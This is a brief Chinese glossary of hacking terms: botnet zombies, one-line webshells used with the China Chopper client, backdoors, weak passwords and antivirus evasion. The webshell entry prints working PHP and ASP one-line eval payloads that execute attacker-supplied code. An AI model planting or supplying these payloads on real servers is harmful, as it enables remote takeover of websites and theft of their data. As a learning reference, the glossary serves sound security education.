名詞解釋： # 1. 肉雞 傀儡機，是指可以被黑客遠程控制的機器。 # 2.一句話木馬 主要用于配合菜刀使用 ``` <?php @eval($_POST['chabug']);?> <%eval request("chabug")%> <%@ Page Language="Jscript"%> ``` ## 菜刀： 主要功能： 文件管理：緩存下載目錄，并支持離線查看緩存目錄。 虛擬終端：方便操作。 數據庫管理：支持數據庫圖形化界面，支持大多數主流數據庫。 # 3. 腳本木馬(WEB SHELL) 空 # 4. 后門 目的就是為了讓我們繞過安全控制獲取目標權限。 一般是指那些繞過安全性控制而獲取對程序或系統訪問權的方法。 在軟件的開發階段，程序員常常會在軟件內創建后門程序以便可以修改程序設計中的缺陷。但是，如果這些后門被其他人知道，或是在發布軟件之前沒有刪除后門程序，那么它就成了安全風險，容易被黑客當成漏洞進行攻擊。 在滲透測試中有很多種后門(webshell、后臺xss、3389登錄shift后門等) # 5. 弱口令 例如：“admin” “123456”這些很容易被人破解的口令 叫做弱口令，弱口令是相對而言的。 # 6. 免殺 免殺的意思就是通過各種方式繞過殺毒軟件攔截的過程